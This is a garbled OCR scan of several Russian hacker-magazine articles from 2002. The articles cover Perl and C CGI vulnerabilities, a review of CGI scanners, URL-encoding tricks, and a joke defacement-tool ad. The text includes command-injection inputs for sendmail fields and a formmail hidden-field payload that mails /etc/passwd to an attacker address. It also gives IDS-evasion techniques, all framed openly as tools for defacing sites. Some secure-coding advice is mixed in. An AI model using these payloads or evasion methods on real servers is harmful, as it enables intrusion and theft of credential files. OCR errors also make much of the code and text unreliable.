eval(«$gbname»); 

В параметре $gbname мы можем передать любые реп-команды, и они вы- 
полнятся. У нас в гостевой книге такой дыры нету просто потому, что я уже 
не смог придумать, куда ее вставить :). 


ПОСЫЛАЕМ! 


В нашей гостевой книге, конечно, не обойтись без отправки комментариев на 
почту. И, естественно, мы сталкиваемся с очередным багом. На этот раз это 
связанно со старой, как мир, программой sendmail. Посмотрим наш скрипт: 
open(MAIL,»|$mailprog $to -s $subject»); 
Ты удивишься, но в этой одной строке у нас сразу две ошибки! Смотри, мы 
запускаем sendamil с параметром $to, который берется из формы и являет- 
ся адресом получателя. Параметр $subject также берется из формы и явля- 
ется темой сообщения. 
Теперь, если в теме сообщения написать, скажем, «test;ls -s /», perl выпол- 
нит, передаст OC следующую строку: 
sendmail moof@real.xakep.ru -s test;ls -5 / 
И что? А то, что выполнится команда «ls -5» - и мы получим содержимое 
каталога. Опять же вместо «ls -s» можно написать любую команду (а 
нужно ли?). 
И второй баг. Он очень похож на первый, и вдвоем они, я думаю, никогда в 
скриптах не встречаются, а вот поодиночке очень даже часто. Теперь мы 
вставим выполнение команды вместо адреса $to, например: 
moof@real.xakep.ru ls -s > gb.cgi 
И опять получим все содержимое каталога себе на мыло. 


ЗАКЛЮЧЕНИЕ. 


Как видишь, большинство ошибок сделано только из-за лени программис- 
та. Из-за того, что он решил не проверять получаемые значения. Стоило 
ему вырезать все спецсимволы с кодом 0 из полученных данных, и от пер- 
вой ошибки мы бы избавились. А вырезать очень просто: 


gb. html 


<form method=»POST» action=»cgi-bin/gb.cgi»> 
<input type=»hidden» name=»date» value=»date»> 
<input type=»hidden» name=»gbname» value=»test»> 
<input type=»hidden» name=»action» value=»add»> 
<p>Vma:<input type=»text» name=»name» 
size=»20»></p> 
<p>E-mail<input type=»text» name=»to» size=»20»></p> 
<p>3aronoBok:<input type=»text» name=»subject» 
size=»20»></p> 
<р>Сообщение:<{ежагеа rows=»2» name=»msg» 
cols=»20»></textarea></p> 
<p><input type=»submit»><input type=»reset»></p> 
</form> 


$gbname = ~s/\0//g; 
A ewe было бы здорово экранировать все спецсимволы, использующиеся в 
oc unix: 

&: «=> ^ () {15 \п\ 
Кроме того, perl имеет встроенные возможности предупреждения о потен- 
циально опасных конструкциях. Для этого существует специальный меха- 
низм меченных данных. Меченные данные это все переменные, которые 
ре-скрпит получил извне (например, из формы). Perl He будет использо- 
вать эти данные, пока они не будут проверены. Для включения безопасно- 
го режима достаточно указать ключ -Т в заголовке скрипта: 

#!/usr/bin/perl -T 
Теперь Ha каждую небезопасную конструкцию perl будет громко ругаться. 
Кстати, есть довольно полезный ресурс: http://www.w3c.org/Security/, на 
котором можно почерпнуть много полезностей относительно безопасного 
веб-программирования. 
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типичные дырки сиевых Cgi 


DarkSergeant ( kSergeant@inbox. ru) 


Тебе, наверное, интересно, почему всякие там кул 
хацкеры используют C/C++, вместо того чтобы 
выучить и заюзать рульный скрипт - Perl, Bash, PHP, 
VBS (нужное подчеркнуть). Отвечаю: 


1. Скорость. В отличие от скриптов, язык C/C++ - компилируемый, поэтому 
код получается быстрее, также язык C/C++ более низкоуровневый, поэтому 
на нем проще избежать накладных расходов. 

2. Надежность. Даже если хакер получит доступ на чтение к папкам, на 
которых лежат исполняемые Сб[-файлы, то его постигнет разочарования, 
т.к. он не найдет исходного кода твоей Сб1Т-шки, т.к. С-шных исходник ты 
хранишь в банке под надежным замком, а на сервере лежит только 
скомпилированная программа. И хакер будет долго разбираться в 
дизассемблере, чтобы понять, есть в твоей программе баги или нет. Также 
С, а особенно C++, является строго типизированным языком, поэтому о 
многих ошибках тебе компилятор скажет еще на этапе компиляции. 

3. Мощность. Для C/C++ намного проще найти или написать нестандартные 
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вещи, начиная OT генерации картинок и музыки при заходе пользователя до 
управления свистком чайника. Также современные компиляторы C++ 
намного опережают по богатству возможностей обычные скрипты. 

4. Время/опыт. Лучше потратить время на углубление своих знаний и 
повышения опыта по использованию С/С++, чем потратить свое время на 
изучение очередного скрипта. Так знание С/С++ поможет тебе написать 
сниффер, Кеудеп, троян, вирус (список можно продолжать до бесконечности), 
а зная только скрипты, ты будешь привязан к узкому кругу задач. 


C++ РУЛИТ 

Скажу тебе по секрету, что все продвинутые хакеры уже давно вместо С 
используют C++ из-за его мощности и удобства. 

В C++ очень легко избежать или свести к 
минимуму все вышеприведенные ошибки. 
Так вместо страшно неудобных и очень 
бажных строк char *, а значит, 
соответственно, и использования функций 
strcat, strcpy, можно использовать класс 
строк - std::string. Вместо опасного 
printf/scanf/gets можно использовать 
std::stream и operator >>/<<. А обычные 
С`шные массивы можно заменит на 
std::vector, std::list, std::map. 

Также не секрет, что многие ошибки в 
программах связаны с тем, что 
программеру было просто лень писать 
более сложный код и он ограничивается 
самым простым (но и, к сожалению, самым 
бажным) вариантом. 

Но и здесь C++ облегчает жизнь 
программисту, т.к. в язык уже включена 
большая и безопасная библиотека STL, с 
помощью которой многие сложные вещи, 
занимающие на С несколько экранов, 
пишутся на С++ в несколько строчек. Также 
использование (++ упрощает повторное 
использование кода, что позволяет один 
раз написать свою небольшую 
библиотечку, а потом ее использовать во 
всех своих программах. 


Если тебя еще не убедили 
вышеприведенные аргументы, то вот тебе 
еще один. Плюсы — поддерживают 


конструкцию try/catch, при ее аккуратном 
применении можно забыть о таких 
сообщениях, как «core dumped», «access 
violation», «division by zero» и т.д. 


А сейчас давай посмотрим, какие ошибки 
можно поиметь при написании CGI-wek на 
C/C++ (мы ведь с тобой кул хацкеры и не 
пишем С6[-шки на всяких там скриптах). 
Сразу тебя обрадую, на С (в дальнейшем, 
говоря С, я подразумеваю C/C++) нет этих 
дурацких ошибок с нулевым символом, а 
также с выполнением программ во время 
простейшего открытия файла. Но в С нас с 
тобой поджидают не менее опасные ошибки: переполнение буфера, 
ошибка форматной строки и др. Ошибки я буду показывать на примере 
обычных консольных программ (это программы, которые работают в 


текстовом режиме), т.к. CGI-wka как раз и является обычной консольной 
программой. 


Та. Переполнение буфера при использовании стандартных 
функций 

Одна из самых распространенных и опасных ошибок, т.к. под данную 
ошибку очень легко написать exploit. 


Пример грубой ошибки: 

char пате[300]; 

scanf(«%s», name); 
Число 300 взято от балды, вместо него могло быть и 30, и 300000, от ошибки 
это не спасает, т.к. все равно можно ввести (или написать прогу, которая 
будет вводить) строку большей длины. 


Пример тонкой ошибки: 

char s[6]; 

itoa (value, s, 10); 
Если переменная value вводилась пользователем, то он мог ввести число, в 
котором цифр больше, чем 5, т.к. самое длинное целое число (- 
2147483648) содержит 13 символов, разницы в 7 символов часто хватает с 
лихвой, чтобы написать под эту ошибку exploit. 
Ошибке «переполнение буфера» подвержены следующие стандартные 
функции (в скобочках указан безопасный аналог, если он есть) - gets 
(fgets), strcpy (strncpy), strcat(strncat), при неосторожном обращении 
опасны также функции - sprintf (snprintf), vsprintf (vsnprintf), scanf, fscanf, 
sscanf, itoa. 


16. Переполнение буфера в своем коде 
Переполнение буфера поджидает не только при 
стандартных функций, но и при написании своего кода. 


использовании 


Пример грубой ошибки: 

int index, value, array[100]; 

std::cout >> index >> value; //вводим номер элемента массива, 
вводим число 

array[index] = value; //записываем введенное число в массив 
В данной задаче надо было проверять переменную index на правильное 
значение - оно должно было быть больше нуля и меньше 100. 


Пример тонкой ошибки: 

char Би! [200], *p = buffer; 

int i= 0; 

for (i = 0; (buf[i] = getchar()) !=‘’ && i < 200; ++i) {} 

buf[i] = 0; 
Максимально введенная строка будет занимать 201 байт, a не 200, как 
рассчитывалось. Exploit на данный конкретный случай будет сложно 
написать, но уронить программу можно будет запросто, а при небольшом 
везении может все-таки получиться и exploit. 


Рекомендации по избежанию данной ошибки просты: 
а. Проверяй все входные параметры на корректность. 
Ь. Будь внимателен при написании кода, работающего с массивами. 


2. Ошибка форматной строки 

При выводе строк с помощью функций семейства printf многие ленивые 
программисты или «крутые оптимизаторы» (которые стараются экономить 
даже на спичках) пишут вместо printf («%s», str) просто printf (str). 

Во втором случае, если строка str вводилась пользователем, в нее можно 
вставить форматные спецификаторы (%5, %4 и т.д.), которые могут не 
только завалить программу, но и поспособствовать выполнению exploit’ a. 
Данной ошибке подвержены следующие функции: все функции 
семейства printf (sprintf, fprintf, vsprintf и т.д.), функции семейства scanf 
(если форматная строка ввода формируется с использованием 
введенных пользователем строк), функции, основанные на printf - syslog, 
setproctitle и т.д. 

Рекомендация одна - «не ленись» и пиши полный вариант вызова, а также 
осторожно используй введенные пользователем строки при формировании 
форматной строки. 


3. Чтение и запись произвольных файлов 
При использовании введенных пользователем строк в качестве имен 
файлов в функциях Open, fopen надо отфильтровывать из введенных строк 
символы ‘.’(если по каким-либо причинам нужна, тогда надо 
отфильтровывать ^\..', "/..’, *../и*..\). 
Пример грамотного кода, который сначала отфильтровывает точки и только 
потом использует для создания директории введенную строку: 

char Би [1024] ={0};; 

fgets (stdin, sizeof(buf)/sizeof(buf[0]), buf); 

for (int j = 0, i = 0; ; ++i) 

{ 


ПИШЕМ БАЖНУЮ CGI’LUKY HA С 


if (buf[i] !=‘.’) 
buf[j++] = buf[i]; 
if (!buf[i]) break; 


} 

mkdir (buf); 
Данную фильтрацию надо применять для всех функций работы с файлами - 
open, fopen, mkdir, rmdir, chdir, tempnam, tmpnam, функции exec, функции 
spawn. 


4. Функция system 

Для выполнения системных утилит или для вызова других программ часто 
используется функция system. Если строки, введенные пользователем, 
используются в функции system, то их надо обязательно брать в кавычки. 
При этом если исходная строка уже содержала кавычки, то их надо 
отфильтровывать (если кавычки в строке все-таки необходимы, тогда их 
нужно эскейпить - заменяя на две кавычки подряд или на слэш кавычки, в 
зависимости от используемой системы). 


Посылаем введенную пользователем строку себе на WinPopup: 
std::string $; = 
std::cin >> s; F 
std::string s2 = «net send 127.0.0:1 «; 
for (std::string::iterator it = s.begin(); it != s.end(); ++it) 
{ 
if (*it == '«’) s2+=‘«’s //или s2+='\\' 
$2+= *it; 
} 
std::system (52); 


EXIT(0) 

В данной статье я рассмотрел только самые широко распространенные 
ошибки, за бортом остались мелкие и специфичные ошибки, а также те 
ошибки, которые невозможно (очень сложно) использовать для внедрения 
exploit® a. 

Напоследок я могу сказать только одно: проверяй и еще раз проверяй все 
введенные параметры, которые приходят со стороны пользователя. 
Проверяй даже в том случае, если эти параметры формируются твоим 
кодом, т.к. если программа стоит у пользователя, ее легко взломать и 
подправить передаваемые параметры либо написать свою программу, 
которая будет опять же генерировать «плохие» данные. Еще лучше, если 
данные, приходящие от пользователя, не используются напрямую, а 
используются только косвенно. Так, если сд91-шка работает с файлами, то 
название файла лучше не передавать на сторону клиента, а лучше 
сохранить в массиве, а клиенту отдать только индекс; при получении 
индекса от клиента обратно проверить его на корректность и достать 
название файла из массива по этому индексу. 


=r 
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В nouCHAH 


BAHAHTHbBIH ОЫР... 


обзор с9!-сканеров 


Сегодня я расскажу тебе о так называемых Cgi-ckKaHepax. Как 
ты уже, наверное, знаешь, абсолютное большинство 
дефейсов делаются именно через дырявые Cgi шки, и обойти 
такую мазу стороной мы в этом номере никак не могли :). 
Принцип работы очень прост - сканер, имеющий свою базу 
данных бажных с! шек, коннектится к серверу, адрес 
которого ему скармливает хацкер, и начинает перебирать все 
скрипты на серваке. Если какой-нибудь из них совпадает со 
скриптом из базы сканера, то сканер сразу сообщает об 
этом хацкеру. Все, ему остается только найти описание 
дырки в этом скрипте и цинично ею воспользоваться ;). 


Скрыпников Сергей aka Slam (slam@soobcha.org) 


При сканировании сервер может возвращать различные значения, если Te- 
бе попалось 200 (OK), то считай, что тебе повезло, но не спеши радоваться, 
так как многие администраторы делают так, что если ты неправильно обра- 
тился к какому-то адресу сервера, то сервер тебя вернет на главную стра- 
ницу. Поэтому при скане все уязвимости в твоем сканере могут выдать вез- 
де 200. В общем, если сканер тебе выдал 200 [ok], то проверяй, что там ле- 
жит. Если же он выдает 200 [оК] на все, то это засада... :(. Лучше оставить 
такой сервак в покое либо отказаться от сд1-скана на нем, либо исхитрить- 
ся как-нибудь еще. 


FUCK’EM ALL 


Итак, думаю, ты заинтересовался с91-сканированием, и я приступаю к само- 
му интересному - обзору самих этих чудо-вещичек. 


Xspider 
Интерфейс: русский 
Размер: 733 Кб 
Количество скриптов: 2835 (для версии 6.02) 
Качать: www.xspider.ru 

ОСь: all win32 


Вот такой BOT он ][паук ;) 


Помимо CGI сканера, XSpider включает в себя дополнительные утилиты: 
- простые сканеры (ТСР и UDP портов) 

- сканер безопасности 

- определитель исходящего трафика на удаленном компьютере 

= Whols сервис 

- проверка анонимности прокси-сервера 

- ТСРи UDP клиенты 

- работа и удаление почты на сервере 


А вот, что пишет сам автор о своей программе: «Одними из отличительных 
особенностей XSpider-a являются: 

- многочисленные ноу-хау, используемые в поиске уязвимостей 

- интеллектуальный подход к распознаванию сервисов 

- уникальная обработка КРС-сервисов всех стандартов с их полной иденти- 
фикацией 

- ‘анализатор структуры и метод интеллектуального распознавания уязви- 
мостей веб-серверов 

- постоянное обновление 


028 september/09/2002 


- бесплатное распространение (для российских пользователей) 
- поддержка нескольких языков» 


Cgi-ckaHep включает в себя сканер веб-серверов, который осуществляет 
сканирование удаленного веб-сервера уязвимых скриптов. Содержит базу 
известных скриптов и Brute словарь. Позволяет сканировать через аноним- 
ный прокси-сервер, включать в запрос к серверу поле Refer, которое пока- 
зывает, откуда пришел запрос на веб-сервер (по умолчанию стоит 
www.microsoft.com ;)), маскировать запросы к серверу, чтобы сканирова- 
ние невозможно было обнаружить с помощью IDS (Intrusion Detection 
System). 

Теперь приступим непосредственно к сканированию, думаю, что вопросов 
типа «Как начать скан?» у тебя не возникнет. Скорость работы не очень 
(мягко сказано ;)) обрадовала, так сервак WWW.MeNKOCOT.KOM он у меня 
просканил за 59 мин. 33 сек. (при моем-то диалапе на 31200 ;)). 


Впечатляет ;) 


Итог: получился неплохой сканер, главное - он сделан нашими соотечест- 
венниками, так что переорганизовывайся в патриота и ставь Xspider себе на 
винт. Правда, только для с91-скана он не очень подходит, т.к., еще раз по- 
вторю, делает все очень медленно ;(. 
Оценка: 3 (ну тормоз он ;)). 


VoidEye 

Интерфейс: english 

Размер: 328 Кб 

Количество скриптов: 119 (для версии VoidEYE 2000 v0.4b4) 
Качать: www. void.ru 

OCb: all win32 


С помощью уязвимого с9!-скрипта можно сделать очень 
многое: иногда даже получить полный доступ к системе. 
Делается это путем передачи скрипту параметров, которые 


скрипт обрабатывает неправильно. Вообще, обычно все 
уязвимости в cgi-ckpuntax появляются из-за того, что автор 
не рассчитывает на то, что его скрипт будет использоваться 
не по назначению. 


Тоже прога, которая написана нашенскими ;). Но это чистый сд1-сканер (об 
этом можно догадаться и по размеру проги). Из возможностей можно отме- 
тить добавление своего эксплойта в базу данных и удаление оного из нее 
же, возможность скана серваков из списка либо скан диапазона ТР-адре- 
сов, смену скина (непонятно только, зачем это надо - прим. ред.). 


STAT s—_— 
Welcome to ¥o E 2000 


16:01:59 :: Started, 119 exploits in base 


В установках ты увидишь флажки «Use Anti-IDS tactics». Это позволяет обхо- 
дить стандартные системы обнаружения атак. К примеру, большинство совре- 
менных серверов воспринимают URL, где символы заменены соответствующи- 
MU uM hex-kogamu, т.е. запросы /cgi-bin/phf и 
/4%63%67%69%20%62%69%6Е/%2Е%70%68 - одно и то же, но никак не сточ- 
ки зрения IDS. Также можно попробовать заменять / на /./ - что одно и то же. 
Вот что нового в версии 54: 

Исправлен баг, в результате которого сканер сканировал «мертвые» подсе- 
ти до упора. Исправлен баг, от которого сканер иногда не работал через 
прокси. Добавлена возможность создавать СОБСТВЕННЫЕ (!) скины. 


И на это всего три минуты ;) 


При использовании очень порадовала скорость работы, программа загре- 
бает весь трафик под себя и работает на полную мощность, так что ее мож- 
но посоветовать тем, у кого мало времени на взлом сайта (хотя... если у те- 
бя мало времени/плохое настроение/родила кошка или подружка, то луч- 
ше вообще не садись за сканирование, т.к. в принципе процесс deface’a 
сайта требует больших мозговых и физических вливаний (и выливаний ;)). 


Итог: хороший сканер ;). 
Оценка: 5 с минусом ;). 


D@MNED CGI Scanner 

Интерфейс: русский и english 

Размер: 363 Кб 

Количество скриптов: 177 (для версии 2.01) 
Качать: www.cc.f2s.com 

ОСь: all win32 


CkaHHep от команды nitrOgear (Х в каком-то из номеров уже писал об этой 
команде). Очень неплохой сканер, есть функция «шпион» - по введенному 
хосту или ip - показывает доступную информацию, включая тип сервера и 
полный заголовок, расположение главной страницы на сервере. 

Есть возможность сканировать просто подсеть, самому пополнять базу уяз- 
вимостей, настраивать сканер для использования прокси. 


В ПОИСКАХ ВАКАНТНЫХ ДЫР... 


А вот так тебе может ответить сервак: 


100 - [Continue] 

101 - [Switching Protocols] 

200 - [OK] 

201 - [Created] 

202 - [Accepted] 

203 - [Non-Authoritative Information] 

204 - [No Content] 

205 - [Reset Content] 

206 - [Partial Content] 

300 - [Multiple Choices] 

301 - [Moved Permanently] 

302 - [Moved Temporarily] 

303 - [See Other] 

304 - [Not Modified] 

305 - [Use Proxy) 

400 - [Bad Request] 

401 - [Unauthorized] 

402 - [Payment Required] 

403 - [Forbidden] 

404 - [Not Found] 

405 - [Method Not Allowed] 

406 - [None Acceptable] 

407 - [Proxy Authentication Required] 

408 - [Request Timeout] 

409 - [Conflict] 

410 - [Gone] 

411 - [Length Required] 

412 - [Unless True] 

500 - [Internal Server Error] 

501 - [Not Implemented] 

502 - [Bad Gateway] 

503 - [Service Unavailable] 
[Gateway Timeout] 


Закладка Scanner log - по-моему, в комментариях He нуждается ;). Возмож- 
но копировать строки, сохранять лог в файл. 

Закладка Scan list -серваки, которые ты желаешь сегодня ночь... ровно в 
12.00 при полнолунии... 339... отсканировать. Можно загрузить список из 
файла, сохранить или редактировать. Поддерживается также сканирование 
подсетей класса «С» (например: 242.50.42.*). Если установлен флаг «скан 
подсети», то содержимое скан-листа игнорируется и сканируется подсеть. 


Вот такой вот он дэцээс 


Закладка CGI holes - это список с91-уязвимостей. Можешь добавить их еще 
из файла, при этом будет произведена проверка на дубликаты, и уязвимос- 
ти будут выстроены в алфавитном порядке. 

Закладка Get info - показывает тип сервера и полный заголовок, включая 
расположение первой страницы на сервере. 

Закладка Options - опций всего две ;). Можно пользоваться проксей и наст- 
раивать месторасположение директории со скриптами (cgi-bin по дефолту). 


Проверим его в деле: 

Первое впечатление после работы: «Вау! Как все быстро рабо- 
тает!». Скорость НАМНОГО быстрее, чем у Xspider’a, и немного 
быстрее, чем у VoidEye. Т.е., можно сказать, абсолютный чамп 
по скорости. 
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Вот это то, о чем я писал вначале статьи 


Итог: Слишком уж все просто, нету никакого общения с юзверем. 
Оценка: 4. 


x2crew Cgi Checker 
Интерфейс: русский 
Размер: 229 Кб 
Количество скриптов: 1148 
Качать: www.x2crew.net 
ОСЬ: all win32 


Опять (не опять, а снова ;)) сканер Ha привычном нам русском языке. 
Из функций можно отметить работу через прокси-сервер, возможность 
загружать свой багз-лист и сохранять результаты сканирования в от- 
дельный файл. А так больше никаких наворотов, все довольно скромно 
и понятно. 


Неплохие результаты 
при достаточно большой 
скорости 


Итог: Есть и лучше. 
Оценка: 4. 


WHISKER 

Интерфейс: хм... интерфейс? 

Количество скриптов: 130 (для версии 1.0) 

Качать: http://www.wiretrip.net/rfp/ 

Обь: Любая ((!!!)(нужнаподдержкаНерла-(для-Ип-= итпре/Гили‘асНуере!)} 


После того, как ты нашел на серваке 
дырявый скрипт и уверен, что он там 
действительно лежит, беги скорее 

на www.void.ru и ищи там статью «СС1-ЖУКС: 
подробно и по-русски» - тут описания 
большинства дырявых скриптов и инструкция 
по использованию дырок в них ;). 


Как утверждает автор программы, сканер использует гибкое веб-сканиро- 
вание (пока только для *п1х систем). Также в сканер включена функция 
анти-105, и, опять же как утверждает автор, во время бета-тестирования 
программы с включенным режимом система ни разу не была засечена 
кем-либо. 

В этом сканере, можно сказать, присутствует проявление интеллекта: на- 
пример, он не будет проверять на предмет .asp в IIS, не будет смотреть Ha 
-htr на серверах Апачи, не будет искать скрипты в /cgi-bin/*, если узнал, 
что /cgi-bin/ вообще не существует. Также у него всегда идет проверка на 
ложные находки, используя метод ‘fingerprinting’ (помнишь, я говорил об 
этом в начале статьи, что иногда сервер и возвращает 200 [ok], но это лож- 
ное срабатывание, так вот с этим сканером, если у тебя появилось 200 [ok], 
то считай, что все в твоих руках... ну, или еще где-нибудь ;)). 

Усач способен провернуть целых девять способов наколки сервера, чтобы 
его админ не заподозрил о произошедшей атаке. В отличие от большинст- 
ва CGI-ckaHepos, Whisker в силах проверять CGI не только НЕАО-методом, но 
и тремя вариантами бЕТ-запросов. 

(Сканер автоматически определяет веб-сервер, который стоит на атакуемом 
хосте. База серверов содержит 90(!) позиций (не хило, да?). Также в нем 
встроено много опций, например, чтение птар, поддержка виртуального 
хоста, прокси и много других. 


Вот ключи ‘для запуска проги: 

-N ввод данных в формате nmap 

-h сканирование одного домена или ТР-адреса 
-Н сканировать лист-адреса 


Пример: perl whisker.pl -H list.txt 
-F многопоточные сканирование 


Пример: perl whisker.pl -В www.microsoft.com -F 100 (запустит 100 пото- 
ков сканирования, хотя больше 50-и на диалап запускать не стоит). 


-5 указывает на файл с дырявыми Сб[-скриптами (по дефолту - scan.db) 
-d Debug режим - ты постоянно вкурсе того, что делает твой сканер 

-W выплывает результат в HTML 

-Г вести логи 

-а для сканирования запароленных ресурсов 


Пример: perl whisker.pl -h members.lolitas.nu. -а loginname:password 


-P файл с паролями (WordList) для перебора оных с целью получения до- 
ступа к запароленным ресурсам (хороший файл с паролями можно утянуть 
тут: http://hakersclub.com/km/files/password_cracker/wordlists/hh_dic- 
tall.zip, 21 Mb) 


Чтобы сервак нас He засек (вернее, админ сервака), в этом сканере можно 
заюзать следующие фичи: 

URL encoding. Для веб-сервера неважно, в-каком виде ты запрашиваешь 
урл странички: будет ли это index.htm sn % 69 % 6Е % 64 % 65 % 78 % 2Е 
% 68 % 74 % 6D - одно и то же. 

Directory insertion. В принципе то же самое, что и выше, но тут кодирует- 
ся не весь URL, а только его часть. 

Fake parameter. К адресу скрипта прибавляется никому не нужный аргу- 
мент. 

Tab separator. Не работает на NT/IIS! Вся суть заключается в том, что боль- 
шинство серверов не обращает внимания на символ табуляции, поэтому его 
можно натыкать в URL сколько угодно. 


В ПОИСКАХ ВАКАНТНЫХ ДЫР... 


Case sensivity. INDEX.HTM = index.htm, ana выньдоса пофиг. 
Session splicing. Разрыв сессии. 


Итог: Очень клевый сканер. Однозначно Must Have! 
Оценка: Твердая, уверенная пятерка. 


THE END 


Итак, думаю, ты уже выбрал себе сканер по душе. Да? A что же дальше? Из- 
вестно, что многие владельцы веб-серверов пользуются стандартными 
скриптами CGI. Либо такие скрипты входят в комплект дистрибутива серве- 
ра, как, например, скрипт upload.pl входит в состав сервера Sambar. И уже 
почти ни для кого не секрет, что данные скрипты являются одним из тех 
мест, через которые можно получить доступ к файлам, правам пользовате- 
ля или и то, и другое на серваке. 

Методы получения неавторизованного доступа через стандартные CGI мож- 
но подразделить на следующие большие группы: 

Доски/конференции. В настоящее время есть много скриптов, пишущих 
данные, переданные им, на \МеБ-страницы. К ним относятся, например, все 
чаты, доски объявлений и гостевые книги. Если скрипт не выполняет про- 
верки входных данных на тэги, это также может привести к нежелательным 
результатам. 

Overflow. Скрипту передается заведомо большой запрос, что приводит к не- 
корректной его обработке, и, как следствие, скрипт может не выполнить 
проверку на, скажем, передачу управления либо совершить непредусмот- 
ренные разработчиком действия. К скриптам такого рода относится, напри- 
мер, args.bat, прилагающийся к Website 1.x. Overflow - атака позволила в 
свое время взломать сервер ID Software. 

Мэлеры. Путем передачи управления, скажем, тому же зепдта Гу, реально 
получить по почте любой файл, на доступ к которому есть права у httpd. 
(Скажем, если на www.host.com находится formmail, то, создав страницу со 
следующими полями: 

<FORM Method=»POST» Action=»http://www.host.com/cgi-bin/form- 
mail.pl»> 

<INPUT TYPE=»hidden» NAME=»recipient»VALUE=»some@email.com; 
/bin/mail your@email.com < /etc/passwd»>, 

можно получить passwd к себе в мыльницу. 


После того как ты нашел на серваке дырявый скрипт и уверен, что он там 
действительно лежит, беги скорее на Www.void.ru и ищи там статью «CGI- 
ЖУКС: подробно и по-русски» - тут описания большинства дырявых 
скриптов и инструкция по использованию дырок в них ;). Или беги сюда: 
http://qwerty.nanko.ru - тут намного больший архив, но уже на ангель- 
ском ;(. 

Ну, на этом, я думаю, мы закончим. 

Если ты все понял, то у тебя скоро получится что-то типа этого: 


Вуаля ;) 


Если появятся какие-то вопросы, сначала поищи ответы в Инете, а по- 


том уже начинай бомбить мой несчастный мыл ;). 
=r 
collin 


page 031 


' Чтобы И въехать в тему статьи, набери в wae 
http://%77%77%77%2E%78%61%6B%65%70%2E% /2% 70. 


НОРЫ CUMBOMmOB i ‚В результате ты попадаешь на сайт твоего лобимого 
ASCII i 


| 
uhh 


` журнала. Эврика? Все гораздо проще. Просто ты 
набрал адрес, используя символы в шестнадцатеричной 
‘системе счисления. Знак «%» показывает, что 
следующая за ним последовательность представлена в 
шестнадцатеричном формате. Для тебя это не очевидно, 
a браузер понимает одинаково хорошо, независимо от 
способа ввода. Эту феньку иногда используют 
‘продвинутые люди, чтобы сбить с толку необразованных 
чайников. Читай, всасывай и применяй по назначению. 


Андрей Каролик (andrusha@sl.ru) 


КОДИРОВАНИЕ СИМВОЛОВ 


Идея заключалась в том, чтобы передавать данные от одного компьютера на 
другой, понимая при этом переданные данные. То есть требовалась некая 
стандартизация передаваемых данных. При помощи международной органи- 
зации стандартизации ISO появился ASCII (American Standard Code for 
Information Interchange), расшифровывается эта аббревиатура как амери- 
канский стандартный код для обмена информацией. Это код для предостав- 
ления символов (всего их в ASCII 128) в виде чисел. Каждому символу сопо- 
ставлено число от 0 до 127. Стандартный набор ASCII еще называют 7-бито- 
вым стандартом, так как данные кодируются при помощи 8 битов, но при этом 
первый бит всегда равен нулю. ASCII описывает только латинские символы, а 
для поддержки других языков используется восьмой бит, позволяющий до- 
бавить еще 128 дополнительных символов. Поэтому после ASCII появились и 
другие кодировки, учитывающие особенности других языков или необходи- 
мые специфические символы. Например, 150 8859-5 - русская кодировка, со- 
держащая 256 символов. Но прелесть состоит в том, что любая кодировка со- 
держит в себе (в своей нижней половине) первые 128 символов ASCII (стан- 
дарт ISO 646). Позже организация Unicode Consortium предприняла попытку 
объединить все нестандартные символы вместе, используя 16-битное коди- 
рование (получается уже 65536 символов). Но первые 128 символов Unicode 
все так же в точности соответствуют стандарту ISO 646 (ASCII). 


КОДИРОВКА СИМВОЛСВ ASCII 
ШЕСТНАДЦАТЕРИЧННОЙ СИСТЕМЕ 
СЧИСЛЕНИЯ (HEXADECIMAL) 


Bet omoons могут быть представлены как в виде символов, так и в виде чи- 
лв й системе счисления. Наиболее привычное использование - в ви- 


лов. Конечно, так проще вводить с клавиатуры и понятнее для вос- 

тия. Но если требуется, наоборот, усложнить восприятие и сбить с тол- 

ку, то можно использовать коды символов в другой системе счисления, 

° например, шестнадцатеричной. Приведу коды He всех 128 символов, a 
только тех, которые можно использовать при запросах в Инете. 


ПРИМЕНЕНИЕ НА ПРАКТИКЕ 


Фишка в том, что в большинстве с91-скриптов есть функции про- 
верки введенных данных. Чтоб все было понятно, давай посмот- 
рим простой пример. Скажем, у нас имеется элементарная база 
данных отзывов юзеров о сайте. На страничке висит форма стре- 


название файла, в который записывает комме! 
приятель! я знаю, что это грубое нарушение все; 


итает все эти файлы и радуется тому 
один прекрасный день приходит хакс 


~.. 


[-deFaGeR XP™ 


ОСВОБОДИ СВОЮ ГОЛОВУ - СДЕЛАЙ ШАГ К НОВОМУ ПОКОЛЕНИЮ ПРОГРАММНОГО ОБЕСПЕЧЕНИЯ!!! 


- Два режима Advanced аа 


- Удобный, = 
интуитивно ПОНЯТНЫЙ werent ic 

7 . 

- Четыре протокола заглавной страницы 

полностью автоматический резки 


a. 
- Целых четыре типа взлома = 


— 


- Возможность работы через proxy. 


Коробочная версия! Включает п тельское соглашение, подробную инструкцию, установочный диск, восемь дисков с дополнительным программным 
обеспечением, диск с пользоват лашением, диск с подробной инструкцией, видео-интервью с разработчиками на двух дисках, а также бонус — ДИСК С 
самой свежей версией базы данных Оранжевые Страницы (ТМ). 


Заплатите $29,99 сегодня и вам больше не придется тратить деньги на дорогие книги и на оплату времени, проведенного в Интернете за чтением 
документации. А самое главное - ваша голова останется девственно пустой и кристально чистой! 


Мы предусмотрели все! Если вы еще не знаете, какой сайт вы хотите задефейсить, вы всегда сможете подобрать себе что-нибудь подходящее 
воспользовавшись базой данных Оранжевые Страницы (ТМ), диск с которой мы вам дарим БЕСПЛАТНО. Мы заботимся о своих клиентах! 


публикуется на правах прикола 


ВЫБЫРАЕТ 
ШЕВ-—-СЕРВЕР 


ROm@n AKA DOceNT (siriusblack@omen.ru), Фоменко Зоя АКА DasaDA (Kammi@yandex.ru) 


Это и изделия корпорации МелкоМягких, например, MS Internet 
Information Server (IIS) и MS Personal Web Server (PWS), и народное твор- 
чество индейцев - Apache, есть и не самые брендовые - вроде Jigsaw. Te, 
что от M$, работают только под Windows, что и неудивительно, так как бра- 
тия из этой конторы скорее удавится, чем добавит совместимость своим 
продуктам хотя бы для одной чужеродной оси (ну и не надо!). Остальные, 
как правило, имеют версии как для окон, так и для никсов. Часть серверов, 
как правило, наиболее известных и часто используемых, являются бес- 
платными. За другие придется платить - это, как правило, серверы с хоро- 
шим уровнем защиты и предназначенные для работы с корпоративными 
системами и базами данных. А некоторые распространяются прямо с ис- 
ходниками. Можешь попробовать их все и сам выбрать. Если тебе пока- 
жется недостаточно информации нашего обзора и захочется узнать о сер- 
верах больше и попробовать что-то другое, то ступай на 
www.ugatu.ac.ru/usatu/html/Inf/page/ye_page/ data/6/5/index.htm, где 
ты найдешь большущий список web-cepBeposB с краткими описаниями и 
